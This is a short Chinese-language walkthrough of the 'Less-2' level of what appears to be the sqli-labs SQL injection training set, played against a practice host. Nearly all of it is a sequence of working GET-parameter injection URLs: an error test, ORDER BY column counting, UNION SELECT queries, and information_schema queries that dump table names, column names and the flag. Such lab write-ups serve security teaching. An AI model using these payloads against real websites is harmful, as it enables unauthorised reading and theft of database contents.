Less-2

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

1.判断是否存在注入

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1'

错误回显 => 存在注入

2.判断参数类型

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 and 1=2

错误回显 => 数字型

3.查看这个网站后台数据库所在的表有几列

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 3

正常回显

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=1 order by 4

错误回显 => 表有3列

4.进行 union select联合查询，发现显示位

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,3 --+

2,3显示出来 => 2,3处为显示位

5.查看所在数据库和数据库版本

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,database(),version() --+

6.查看数据库的表

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

7.查看ec26n7Hw表中的列

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="ec26n7Hw" --+

8.查看表中的flag列中的数据

https://636-65f5fb24-992d-492e-85d2-825602bad062.do-not-trust.hacking.run/?id=-1 union select 1,2,group_concat(id,flag) from ec26n7Hw --+